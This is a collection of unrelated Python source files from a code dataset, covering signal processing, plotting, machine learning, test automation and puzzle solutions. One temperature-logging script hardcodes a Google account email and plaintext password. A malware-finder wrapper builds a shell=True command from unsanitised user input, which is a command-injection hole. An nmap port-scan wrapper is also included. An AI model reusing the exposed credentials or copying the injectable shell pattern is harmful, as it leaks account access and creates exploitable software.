for tick in range(tick0, tickn):\n w = widelane_ambiguity(station_data, sta1, sta2, prn1, prn2, tick)\n if math.isnan(w):\n continue\n widelane_dds.append(w)\n ticks.append(tick)\n\n widelane_dd = numpy.mean(widelane_dds)\n print(\"wideland double difference: {0:0.3f} +/- {1:0.4f}\".format(\n widelane_dd, numpy.std(widelane_dds)\n ))\n\n widelane_dd = round(widelane_dd)\n\n # step 2:\n # estimate N_Ws\n ws, errs, _ = widelane_solve(widelane_dd, station_data, sta1, sta2, prn1, prn2, ticks[0])\n\n # step 3:\n ns = []\n for i, (sta, prn) in enumerate(product([sta1, sta2], [prn1, prn2])):\n n1, err = test_n1(ws[i], station_data, sta, prn, ticks)\n n2 = n1 - ws[i]\n ns.append( (n1, n2, err) )\n \n return ns\n\ndef lambda_parms(y, A, B, Qy):\n Qyinv = numpy.linalg.inv(Qy)\n print(Qyinv)\n\n Pb = B @ numpy.linalg.inv(B.T @ Qyinv @ B) @ B.T @ Qyinv\n Pb_perp = numpy.eye(2) - Pb\n Abar = Pb_perp @ A\n\n print(Abar)\n\n print(Abar.T @ Qyinv @ Abar)\n Qa = numpy.linalg.inv(Abar.T @ Qyinv @ Abar)\n\n ahat = Qa @ Abar.T @ Qyinv @ y\n return ahat, Qa\n","sub_path":"pytid/graveyard/ambiguity_correct_graveyard.py","file_name":"ambiguity_correct_graveyard.py","file_ext":"py","file_size_in_byte":17413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"94681243","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pylab\n\n'''g = open('/Users/saraswathivenkatesh/svenkate-surf-2011-mturk/data/birdscale/\\\nimage-ids.yaml', 'r')\nnames = []\nIds = []\nx = g.readline()\nwhile x != \"\":\n x = x.split()\n for i, j in enumerate(x):\n if i%2 == 0:\n if j[0] == '{':\n j = j[1:]\n names.append(int(j[14:-5]))\n else:\n Ids.append(j[:-1])\n x = g.readline()\ng.close()\nIdssort = [0 for i in range(256)]\nfor i in range(256):\n indx = names.index(i)\n Idssort[i] = Ids[indx]\n\nh = open('birdimageIds.txt', 'r')\nIdsordered = []\nx = h.readline()\nwhile x != \"\":\n x = x.split()\n Idsordered.append(x[1])\n x = h.readline()\nh.close()'''\n\nf = open('birdtime.txt', 'r')\ntimes = []\nx = f.readline()\nwhile x != \"\":\n t = []\n if x != \"\\n\":\n x = x.split()\n for i,j in enumerate(x):\n if j != '0':\n t.append(int(j))\n times.append(t)\n x = f.readline()\n \nf.close()\n\n'''avgT = []\nfor t in range(len(times[0])):\n sm = 0\n div = 0\n for ann in times:\n if ann[t] != 0:\n sm += float(ann[t])\n div += 1\n avgT.append(sm/div)'''\n \n'''avgTsort = [0 for i in range(len(avgT))]\nfor i, j in enumerate(avgT):\n label = Idsordered[i]\n indx = Idssort.index(label)\n avgTsort[indx] = int(j)'''\n \n#x = range(len(avgT))\navgmedian = 0\navgmean = 0\nalltimes = []\n\nfor i,j in enumerate(times):\n fig, ax = plt.subplots(1)\n bins = [float(k)/5 for k in range(0,21)]\n n, b = np.histogram(np.log10(j), bins)\n bincenters = [10**(k+.1) for k in bins[:-1]]\n plt.semilogx(bincenters, n)\n plt.xlabel('Time spent (ms)')\n plt.ylabel('Count')\n plt.title('Histogram of time spent by Annotator '+str(i))\n plt.ylim(ymax=110)\n median = np.median(j)\n avgmedian += median\n mu = np.mean(j)\n avgmean += mu\n textstr = '$\\mu=%.2f$\\n$\\mathrm{median}=%.2f$' %(mu, median)\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n ax.text(0.1, 0.95, textstr, transform=ax.transAxes, fontsize=14,\\\n verticalalignment='top', bbox=props)\n plt.savefig('Ann'+str(i)+'-times-bird.png')\n alltimes.append(mu)\n \nf = open('alltimes-bird.txt', 'w')\nfor i in alltimes:\n f.write(str(i)+' ')\nf.close()\n \navgmedian = avgmedian/len(times)\navgmean = avgmean/len(times)\nfig, ax = 
plt.subplots(1)\nbins = [float(k)/5 for k in range(0,21)]\nn, b = np.histogram(alltimes, bins)\nbincenters = [10**(k+.1) for k in bins[:-1]]\nplt.semilogx(bincenters, n)\nplt.xlabel(\"Time Spent (ms)\")\nplt.ylabel(\"Count\")\nplt.title(\"Histogram of Time Spent by All Annotators\")\nprops = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\ntextstr = '$\\mu=%.2f$\\n$\\mathrm{median}=%.2f$' %(avgmean, avgmedian)\nax.text(0.1, 0.95, textstr, transform=ax.transAxes, fontsize=14, \\\n verticalalignment='top', bbox=props)\nplt.savefig('bird-avgtimes.png')","sub_path":"Algorithms/Mturk-data/Birds/TimeHist-bird.py","file_name":"TimeHist-bird.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"438881788","text":"###-------This code predicts the topology of multiple sequences as an S if it's signal peptide or . if it's not, in form of ID, sequence and topology----------###\n\nimport input_good\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.externals import joblib\n\n\nloaded_model = joblib.load('signalP+_model2.sav')\nwindow_size = 39\n\ndef predict_signalP(filename2):\n \n predicting_topo = input_good.parser_output(filename2)\n z = loaded_model.predict(predicting_topo) \n results = z\n \n signalP_decode = {0:\".\",4:\"S\"}\n decoded_topo_list = []\n for element in results:\n decoded_topo_list.append(signalP_decode[element])\n \n endSP = 0\n start = 0\n \n filet = open(filename2,'r+')\n texti = filet.read().splitlines()\n for lines in range(len(texti)):\n #print(lines)\n if texti[lines].startswith (\">\"):\n endSP = endSP +len(texti[lines+1])\n j =\"\".join(decoded_topo_list[start:endSP])\n print(texti[lines])\n print(texti[lines+1])\n print(j)\n start = endSP\n \n \n \nif __name__ == '__main__':\n predict_signalP('predict_protein.txt')\n\n","sub_path":"Protein_prediction_SVM/optimized_predictor.py","file_name":"optimized_predictor.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"351028605","text":"#!/usr/bin/python\n\nfrom sys import stdin, stdout\n\nT = int(stdin.readline().strip())\n\nfor case_num in range(1, T+1):\n pancakes = stdin.readline().strip()\n i = 1\n total = 0\n while i < len(pancakes):\n if pancakes[i-1] != pancakes[i]:\n total += 1\n i += 1\n if pancakes[len(pancakes)-1] == '-':\n total += 1\n answer = str(total)\n stdout.write(\"Case #{:d}: {:s}\\n\".format(case_num, answer))\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_ackien_main.py","file_name":"16_0_2_ackien_main.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486947409","text":"# $language = \"Python\"\r\n# $interface = \"1.0\"\r\nimport sys\r\nsys.path.append('.')\r\nimport testlib\r\nreload(testlib)\r\ntestlib.init()\r\nif __name__ == '__builtin__':\r\n testlib.crt = crt\r\n sys.dont_write_bytecode = True\r\n\r\nfiles=[\r\n 'test_dsp0_i2s(i2s1-i2sadc-rxch0).py',\r\n 'test_dsp0_i2s(i2s1-i2sadc-rxch1).py',\r\n 'test_dsp0_i2s(i2s1-i2sadc-rxch2).py',\r\n 'test_dsp0_i2s(i2s1-i2sadc-rxch[0-2]).py',\r\n 'test_dsp0_i2s(i2sdac-i2sadc-rxch0).py',\r\n 'test_dsp0_i2s(i2sdac-i2sadc-rxch1).py',\r\n 'test_dsp0_i2s(i2sdac-i2sadc-rxch2).py',\r\n 'test_dsp0_i2s(i2sdac-i2sadc-rxch[0-2]).py',\r\n ]\r\n\r\nmenu=''\r\ncount=1\r\nmenu_option=-1\r\n\r\nfor str1 in files:\r\n menu= menu + str(count)+'. 
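# The histogramming in TimeHist-bird.py above bins log10(times) on edges
# [0, 0.2, ..., 4.0] and plots against geometric bin centers. An equivalent,
# arguably clearer form uses np.logspace directly (sample values illustrative):
import numpy as np

samples = np.array([12.0, 90.0, 150.0, 800.0, 2300.0, 9000.0])
counts_log, _ = np.histogram(np.log10(samples), np.linspace(0, 4, 21))
counts_lin, _ = np.histogram(samples, np.logspace(0, 4, 21))
assert (counts_log == counts_lin).all()               # same 20 bins either way
centers = 10 ** (np.linspace(0, 4, 21)[:-1] + 0.1)    # geometric centers, as plotted above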
'+str1.split('.')[0] + '\\n'\r\n count = count+1\r\n\r\nwhile (menu_option > count or menu_option < 1):\r\n menu_select = str(count)\r\n menu_select = crt.Dialog.Prompt(menu,\"Select I2S test item\", '1', False)\r\n if menu_select == '':\r\n exit()\r\n if (int(menu_select) >= 1) and (int(menu_select) < count):\r\n execfile(files[int(menu_select)-1])\r\n exit()\r\n","sub_path":"cdl_fpga/dsp1/test_dsp1_i2s.py","file_name":"test_dsp1_i2s.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"50061460","text":"#Code to read from Digital Temperature probe and report information to Google Docs.\n#Code written and tested 29/08/2014 working ok.\n\n#import files necessary for code to run\nimport os\nimport glob\nimport time\nimport sys\nimport gspread\nimport datetime\n\n#Google account details\nemail = 'jeremygwest@gmail.com'\npassword = '63v1b5y4'\nspreadsheet = 'Temperature_Log' #the name of the spreadsheet already created\n \n#attempt to log in to your google account\ntry:\n gc = gspread.login(email,password)\nexcept:\n print('fail')\n sys.exit()\n \n#open the spreadsheet\nworksheet = gc.open(spreadsheet).sheet1\n\n#confirm the temeprature probe is connected\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\n\n#locate temperature probe log file for reading temperature\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28*')[0]\ndevice_file = device_folder + '/w1_slave'\n\n#read raw data from temperature probe\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n\n#convert data to human readable temperature\ndef read_temp():\n lines = read_temp_raw()\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp = float(temp_string) / 1000.0\n #temp_f = temp_c * 9.0 / 5.0 + 32.0\n return temp, #temp_f\n\t\n#print temperature to google docs\nwhile True: #infinite loop\n temp = read_temp() #get the temp\n values = [datetime.datetime.now(), temp[0]]\n worksheet.append_row(values) #write to the spreadsheet\n time.sleep(600) #wait 10 minutes\n\n","sub_path":"templog google docs v1.1.2.py","file_name":"templog google docs v1.1.2.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"186821633","text":"#!/usr/bin/env python\nimport rospy\nimport math\nimport tf\nfrom geometry_msgs.msg import Twist \nfrom nav_msgs.msg import Odometry\n\nif __name__ =='__main__':\n\t\n rospy.init_node('tf_listen') # Initializing the a node\n listener = tf.TransformListener()\n rob_vel = rospy.Publisher('/robot_1/cmd_vel',Twist,queue_size = 1) # Publishing command velocity to move the robot\n rate = rospy.Rate(100.0)\n \n while not rospy.is_shutdown():\n try:\n now = rospy.Time.now()\n listener.waitForTransform(\"/robot_1/odom\",\"/robot_0/odom\", rospy.Time(0), rospy.Duration(1.0))\n (trans,orie) = listener.lookupTransform('/robot_1/odom','/robot_0/odom', rospy.Time(0))\n except (tf.LookupException, tf.ConnectivityException,tf.ExtrapolationException):\n continue\n angular = 4 * math.atan2(trans[1], trans[0])\n linear = 0.5 * math.sqrt(trans[0] ** 2 + trans[1] ** 2)\n cmd = Twist()\n cmd.linear.x = linear\n cmd.angular.z = angular\n rob_vel.publish(cmd)\n 
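# The temperature logger above polls a DS18B20 through the w1-therm sysfs file.
# Its parsing is separable and testable offline; the sample payload mimics the
# driver's two-line w1_slave format (CRC line, then a "t=" line in millidegrees).
def parse_w1_slave(text):
    lines = text.splitlines()
    if not lines or not lines[0].strip().endswith("YES"):
        return None                        # CRC failed; caller should retry
    pos = lines[1].find("t=")
    return int(lines[1][pos + 2:]) / 1000.0 if pos != -1 else None

sample = ("72 01 4b 46 7f ff 0e 10 57 : crc=57 YES\n"
          "72 01 4b 46 7f ff 0e 10 57 t=23125")
assert parse_w1_slave(sample) == 23.125    # millidegrees -> degrees Celsius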
rate.sleep()\n","sub_path":"Cognition/evader-pursuer/scripts/tflisten.py","file_name":"tflisten.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"42802680","text":"import time\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.support.select import Select\n#edited\n\nclass AssignmentHrm(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n print(\"This will get executed only once before the setUp method for the first test\")\n\n @classmethod\n def tearDownClass(cls):\n print(\"This will get executed only once after the tearDown method for the last test\")\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=r\"C:\\Users\\rajdeep.m\\PycharmProjects\\duringclass\\resources/chromedriver.exe\")\n self.driver.maximize_window()\n\n def tearDown(self):\n self.driver.quit()\n\n def test_combo(self):\n self.driver.get(\"https://opensource-demo.orangehrmlive.com/\")\n username = self.driver.find_element_by_id(\"txtUsername\")\n username.send_keys(\"Admin\")\n password = self.driver.find_element_by_id(\"txtPassword\")\n password.send_keys(\"admin123\")\n self.driver.find_element_by_id(\"btnLogin\").click()\n time.sleep(3)\n leavellist = self.driver.find_element_by_partial_link_text(\"Leave List\")\n leavellist.click()\n time.sleep(3)\n scheduled = self.driver.find_element_by_id(\"leaveList_chkSearchFilter_2\")\n if not scheduled.is_selected():\n scheduled.click()\n taken = self.driver.find_element_by_id(\"leaveList_chkSearchFilter_3\")\n if not taken.is_selected():\n taken.click()\n pending_for_approval = self.driver.find_element_by_id(\"leaveList_chkSearchFilter_1\")\n if pending_for_approval.is_selected():\n pending_for_approval.click()\n subunit = self.driver.find_element_by_id(\"leaveList_cmbSubunit\")\n subunitselect = Select(subunit)\n subunitselect.select_by_visible_text(\"IT\")\n expected_options = [\"All\",'Sales','Administration','IT','Finance']\n actual_options = []\n for one_option in subunitselect.options:\n actual_options.append(one_option.text)\n self.assertListEqual(expected_options,actual_options)\n\n\n\n","sub_path":"Assignment123may.py","file_name":"Assignment123may.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342223745","text":"##\n## Programación en Python\n## ===========================================================================\n##\n## Genere una lista de tuplas, donde cada tupla contiene en la primera \n## posicion, el valor de la segunda columna; la segunda parte de la \n## tupla es una lista con las letras (ordenadas y sin repetir letra) \n## de la primera columna que aparecen asociadas a dicho valor de la \n## segunda columna. 
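# The checkbox handling in Assignment123may.py above clicks only when the
# current state differs from the desired one, which makes the step idempotent.
# Offline illustration with a stand-in element (no browser needed):
class FakeCheckbox:
    def __init__(self, selected): self._selected = selected
    def is_selected(self): return self._selected
    def click(self): self._selected = not self._selected

def set_checked(box, desired):
    if box.is_selected() != desired:       # toggle only on mismatch
        box.click()

box = FakeCheckbox(False)
set_checked(box, True); set_checked(box, True)   # second call is a no-op
assert box.is_selected()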
Esto es:\n##\n## Rta/\n## ('0', ['C'])\n## ('1', ['A', 'B', 'D', 'E'])\n## ('2', ['A', 'D', 'E'])\n## ('3', ['A', 'B', 'D', 'E'])\n## ('4', ['B', 'E'])\n## ('5', ['B', 'C', 'D', 'E'])\n## ('6', ['A', 'B', 'C', 'E'])\n## ('7', ['A', 'C', 'D', 'E'])\n## ('8', ['A', 'B', 'E'])\n## ('9', ['A', 'B', 'C', 'E'])\n##\n## >>> Escriba su codigo a partir de este punto <<<\n##\nimport pandas as pd\nf = pd.read_csv(\"data.csv\", sep=\"\\t\", names=list(range(1,6)))\n\ndf = f.groupby(2)[1].apply(list)\n\nfor i in df.index:\n print(repr((str(i),sorted(list(set(df[i]))))))\n","sub_path":"03-python=1/q08=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"87228334","text":"import os\nimport subprocess\nimport colorama \n\n\ndef tool (tool_name, dir) :\n if tool_name == \"malware_tools\" :\n cmd = \"./phpmalwarefinder \"+dir+ \"| sed -e '1,/You should take a look at the files listed below:/ d' | awk '{print $NF}'\"\n listIp= subprocess.run(cmd,text= True, shell = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.splitlines()\n\n if not listIp : \n print (colorama.Fore.GREEN+\"No malicious files found in \"+dir+\"\\n\")\n elif listIp : \n print (colorama.Fore.CYAN+\" Malicous files detected \"+colorama.Fore.RESET+\"\\n\")\n for file in listIp :\n path_name = os.path.split(file) \n print (colorama.Fore.RESET+\"File path \"+colorama.Fore.RED+path_name[0]+colorama.Fore.RESET+\" and file name \"+colorama.Fore.RED+path_name[1]+colorama.Fore.RESET)\n \n\n\n\n\n\nif __name__ == \"__main__\": \n try : \n tool_name = input('Please specify the tool to use: ')\n directory = input('Please the directory to scan: ')\n tool (tool_name,directory)\n except : \n print (\"Error occured \")","sub_path":"maliciousfiledetectionc.py","file_name":"maliciousfiledetectionc.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456511824","text":"\r\nclass Palindrome:\r\n # Longest Palindrome O(n^2)\r\n def longestPalindrome(self, s: str) -> str:\r\n start = 0\r\n end = 0\r\n\r\n for i in range(0, len(s)):\r\n len1 = self.expandAroundCenter(s, i, i)\r\n len2 = self.expandAroundCenter(s, i, i + 1)\r\n maxLen = max(len1, len2)\r\n\r\n if maxLen > end - start:\r\n start = i - (maxLen // 2)\r\n end = i + maxLen // 2\r\n\r\n return s[start : end + 1]\r\n\r\n def expandAroundCenter(self, s: str, i: int, j = int) -> int:\r\n left = i\r\n right = j\r\n while left >= 0 and right < len(s) and s[left] == s[right]:\r\n left -= 1\r\n right += 1\r\n return right - left - 1\r\n\r\npal = Palindrome()\r\nprint(pal.longestPalindrome('babad'))","sub_path":"python/arrays_strings/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"13915801","text":"'''\nAuthor: Shuailin Chen\nCreated Date: 2020-11-27\nLast Modified: 2021-04-12\n'''\nimport os.path as osp\nimport matplotlib.pyplot as plt\nimport shutil\nimport cv2\nimport numpy as np\nimport os\n\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils import data\n\nfrom ptsemseg.utils import get_logger\nfrom ptsemseg.metrics import runningScore, averageMeter\nfrom ptsemseg.augmentations import get_composed_augmentations\nfrom ptsemseg.loader import get_loader \nfrom ptsemseg.models import get_model\n\nimport 
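# The exercise in question.py above asks, for each value in column 2, for the
# sorted, de-duplicated letters of column 1 that co-occur with it. The same
# groupby works on inline data (a stand-in for data.csv):
import pandas as pd

df = pd.DataFrame({1: list("ABCAB"), 2: ["1", "0", "5", "1", "4"]})
grouped = df.groupby(2)[1].apply(list)
for key in grouped.index:
    print((key, sorted(set(grouped[key]))))
# ('0', ['B'])  ('1', ['A'])  ('4', ['B'])  ('5', ['C'])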
args\nimport utils\nfrom mylib import types\n\n\n\ndef test(cfg, logger, run_id):\n    # augmentations \n    augments = cfg.test.augments\n    data_aug = get_composed_augmentations(augments)\n\n    # dataloader\n    data_loader = get_loader(cfg.data.dataloader)\n    data_loader = data_loader(root=cfg.data.path, data_format=cfg.data.format, augments=cfg.test.augments, split=cfg.test.dataset)\n    os.mkdir(osp.join(run_id, cfg.test.dataset))\n    \n    logger.info(f'data path: {cfg.data.path}')\n    logger.info(f'num of {cfg.test.dataset} set samples: {len(data_loader)}')\n\n    loader = data.DataLoader(data_loader,\n                        batch_size=cfg.test.batch_size, \n                        num_workers=cfg.test.n_workers, \n                        shuffle=False,\n                        persistent_workers=True,\n                        drop_last=False)\n\n    # model\n    model = get_model(cfg.model, n_classes=2)\n    logger.info(f'using model: {cfg.model.arch}')\n    device = f'cuda:{cfg.gpu[0]}'\n    model=model.to(device)\n    model = torch.nn.DataParallel(model, device_ids=cfg.gpu)\n\n    # load model params\n    if osp.isfile(cfg.test.pth):\n        logger.info(\"Loading model from checkpoint '{}'\".format(cfg.test.pth))\n\n        # load model state\n        checkpoint = torch.load(cfg.test.pth)\n        model.load_state_dict(checkpoint[\"model_state\"])\n        # best_cls_1_acc_now = checkpoint[\"best_cls_1_acc_now\"]\n        # best_cls_1_acc_iter_now = checkpoint[\"best_cls_1_acc_iter_now\"]\n    else:\n        raise FileNotFoundError(f'{cfg.test.pth} file not found')\n\n    # Setup Metrics\n    running_metrics_val = runningScore(2)\n    running_metrics_train = runningScore(2)\n    metrics = runningScore(2)\n\n    # test\n    model.eval()\n    img_cnt = 0\n    with torch.no_grad():\n        for (file_a, file_b, label, mask) in loader:\n            file_a = file_a.to(device) \n            file_b = file_b.to(device) \n            label = label.numpy()\n            mask = mask.numpy()\n\n            outputs = model(file_a, file_b)\n            pred = outputs.max(1)[1].cpu().numpy()\n            confusion_matrix_now = metrics.update(label, pred, mask)\n\n            for idx, cm in enumerate(confusion_matrix_now):\n                cm *=100\n                pred_filename = osp.join(run_id, cfg.test.dataset, f'{img_cnt}_{cm[0, 0]:.2f}_{cm[1, 1]:.2f}_pred.png')\n                gt_filename = osp.join(run_id, cfg.test.dataset, f'{img_cnt}_{cm[0, 0]:.2f}_{cm[1, 1]:.2f}_gt.png')\n                img_cnt += 1\n\n                if cv2.imwrite(pred_filename, (pred[idx, :, :]*255).astype(np.uint8)) and cv2.imwrite(gt_filename, (label[idx, :, :]*255).astype(np.uint8)):\n                    logger.info(f'wrote {pred_filename}')\n                else:\n                    logger.info(f'failed to write {pred_filename}')\n\n    score,_ = metrics.get_scores()\n    # score_train,_ = running_metrics_train.get_scores()\n    # score_val,_ = running_metrics_val.get_scores()\n    acc = score['Acc']\n    # acc_train = score_train['Acc']\n    # acc_val = score_val['Acc']\n    logger.info(f'acc : {acc}\\tOA:{acc.mean()}')\n    micro_OA = score['Overall_Acc']\n    miou = score['Mean_IoU']\n    logger.info(f'overall acc: {micro_OA}, mean iou: {miou}')\n    # logger.info(f'acc of train set: {acc_train} \\nacc of val set: {acc_val}')\n\n\n\nif __name__=='__main__':\n    cfg = args.get_argparser('configs/psr_siamdiff_pauli.yml')\n    del cfg.train\n    torch.backends.cudnn.benchmark = True\n\n    run_id = utils.get_work_dir(osp.join(cfg.test.out_path, osp.split(osp.split(cfg.test.pth)[0])[1]))\n    # writer = SummaryWriter(log_dir=run_id)\n    # config_fig = types.dict2fig(cfg.to_flatten_dict())\n    # writer.add_figure('config', config_fig, close=True)\n    # writer.flush()\n    shutil.copy(cfg.config_file, run_id)\n\n    # logger\n    logger = get_logger(run_id)\n    logger.info(f'RUN DIR: {run_id}')\n\n    test(cfg, logger, run_id)\n    logger.info(f'RUN DIR: 
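# runningScore's internals aren't shown above, but overall accuracy and mean
# IoU follow from any confusion matrix in the standard way (rows = ground
# truth, columns = prediction; the values below are illustrative):
import numpy as np

cm = np.array([[90.0, 10.0],
               [ 5.0, 45.0]])
overall_acc = np.diag(cm).sum() / cm.sum()                  # 0.90
iou = np.diag(cm) / (cm.sum(0) + cm.sum(1) - np.diag(cm))   # TP / (TP + FP + FN)
print(overall_acc, iou.mean())                              # mIoU ~= 0.80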
{run_id}')","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"444435568","text":"#\n# @lc app=leetcode id=957 lang=python3\n#\n# [957] Prison Cells After N Days\n#\n\n# @lc code=start\n\n\nclass Solution:\n def prisonAfterNDays(self, cells: List[int], N: int) -> List[int]:\n\n seen = dict()\n is_fast_forwarded = False\n\n while N > 0:\n # we only need to run the fast-forward once at most\n if not is_fast_forwarded:\n state_key = tuple(cells)\n if state_key in seen:\n # the length of the cycle is seen[state_key] - N\n N %= seen[state_key] - N\n is_fast_forwarded = True\n else:\n seen[state_key] = N\n\n # check if there is still some steps remained,\n # with or without the fast-forwarding.\n if N > 0:\n N -= 1\n next_day_cells = self.nextDay(cells)\n cells = next_day_cells\n\n return cells\n\n def nextDay(self, cells: List[int]):\n ret = [0] # head\n for i in range(1, len(cells)-1):\n ret.append(int(cells[i-1] == cells[i+1]))\n ret.append(0) # tail\n return ret\n\n \n \n# @lc code=end\n\n","sub_path":"LeetCodePremium/957.prison-cells-after-n-days.py","file_name":"957.prison-cells-after-n-days.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"212200657","text":"# -*- coding: utf-8 *-*\n\nimport sqlalchemy\n\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm.session import sessionmaker\n\nfrom zope.sqlalchemy.datamanager import ZopeTransactionExtension\n\n\ndef connection(settings, backend, db):\n bind = sqlalchemy.engine_from_config(settings, 'pyramid_db.backend.%s.%s.' % (backend, db))\n session = scoped_session(\n sessionmaker(\n autoflush=True, \n autocommit=False, \n bind=bind, \n extension=ZopeTransactionExtension()\n )\n )\n return session\n","sub_path":"pyramid_db/backends/backend_sqlalchemy.py","file_name":"backend_sqlalchemy.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556646220","text":"import pathlib\nimport subprocess\nfrom time import sleep\nimport os\n\nfrom config_files.init_logger import logger\nfrom config_files.paths import PATH_TO_SH_SCRIPT_NAAUBU, PORTS_PATH\nfrom ports.nmap_output_parser import nmap_output_parser\n\n\ndef naabu_starter(full_command: list[str], nmap_output_path: pathlib.Path) -> list[str]:\n logger.info(\"Start port scan with nmap\")\n\n command = \" \".join(full_command)\n logger.info(f\"Run nmap command: {command}\")\n\n process_send_command = subprocess.run(\n full_command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n if not process_send_command.returncode:\n logger.info(\n f\"Command done successfully. Return code: {process_send_command.returncode}\"\n )\n else:\n logger.error(\"nmap end with error\")\n raise ChildProcessError(f\"Error while execute nmap.\"\n f\" Naabu stdout: {process_send_command.stdout.decode('utf-8')}. \"\n f\"Naabu stderr: {process_send_command.stderr.decode('utf-8')}\")\n\n logger.info(f\"Nmap output stored to {nmap_output_path.as_uri()}\")\n nmap_output_as_xml = nmap_output_path.read_text()\n\n all_ports = nmap_output_parser(nmap_output_as_xml=nmap_output_as_xml)\n logger.info(f\"Parse nmap output DONE. 
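# The fast-forward in the LeetCode 957 solution above works because both end
# cells are forced to 0 after one step, so at most 2**6 middle configurations
# exist and the sequence must enter a cycle; N is then reduced modulo the
# cycle length. Finding that cycle empirically:
def next_day(cells):
    return [0] + [int(cells[i - 1] == cells[i + 1])
                  for i in range(1, len(cells) - 1)] + [0]

seen, cells, day = {}, [1, 0, 0, 1, 0, 0, 1, 0], 0
while tuple(cells) not in seen:
    seen[tuple(cells)] = day
    cells, day = next_day(cells), day + 1
print("cycle length:", day - seen[tuple(cells)])   # comes out to 1, 7, or 14 for 8 cells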
Found: {len(all_ports)} open ports.\")\n\n nmap_output_path.unlink()\n logger.info(\"Nmap output as xml deleted\")\n\n return all_ports\n","sub_path":"ports/nmap_starter.py","file_name":"nmap_starter.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"397342841","text":"\"\"\"\nThe knowledge base embedding matrix is extremely large. We preprocess teh entity list to load only relevant entities.\n\"\"\"\n\nimport json\n\n\ndef prepare_embeddings():\n\n entity2idx = {}\n with open(\"../entity-linking/data/WikidataEmb/dec_17_50/\" + \"entity2id.txt\", 'r') as f:\n f.readline()\n for l in f.readlines():\n k, v = tuple(l.strip().split(\"\\t\"))\n entity2idx[k] = int(v)\n\n\n with open(\"data/data-annotations/train_entitylinking.json\") as f:\n data_annotations = json.load(f)\n\n with open(\"data/data-annotations/dev_entitylinking.json\") as f:\n data_annotations += json.load(f)\n\n with open(\"data/data-annotations/test_entitylinking.json\") as f:\n data_annotations += json.load(f)\n\n entity_ids = {e['linkings'][0][0] for l in data_annotations for s in l for e in s['entities'] if len(e['linkings']) > 0}\n\n entity2idx = [(k, v) for k, v in entity2idx.items() if k in entity_ids]\n print(len(entity2idx))\n\n entity2idx = [(k,v,i) for i, (k, v) in enumerate(entity2idx)]\n\n with open(\"data/entity2id.filtered.txt\", 'w') as out:\n for t in entity2idx:\n out.write(\"\\t\".join([str(el) for el in t]) + \"\\n\")\n\n\nif __name__ == '__main__':\n prepare_embeddings()","sub_path":"semanticparsing/wikidata/prepare_kb_embeddings.py","file_name":"prepare_kb_embeddings.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"425968746","text":"import pytest\n\nfrom myia import myia\nfrom myia.compile.backends import load_backend\nfrom myia.lib import Empty, HandleInstance, core\nfrom myia.operations import handle, handle_get, handle_set\nfrom myia.pipeline import standard_pipeline, steps\n\ntry:\n load_backend(\"relay\")\nexcept Exception:\n pytestmark = pytest.mark.skip(\"Requires relay\")\n\n\nupipeline = standard_pipeline.insert_after(\"parse\", resolve=steps.step_resolve)\n\n\ndef add_one(x):\n # Not universal, but should work from universal function\n return x + 1\n\n\n@core(use_universe=True)\ndef increment(h):\n return handle_set(h, add_one(handle_get(h)))\n\n\ndef test_increment():\n @myia(\n use_universe=True,\n backend=\"relay\",\n 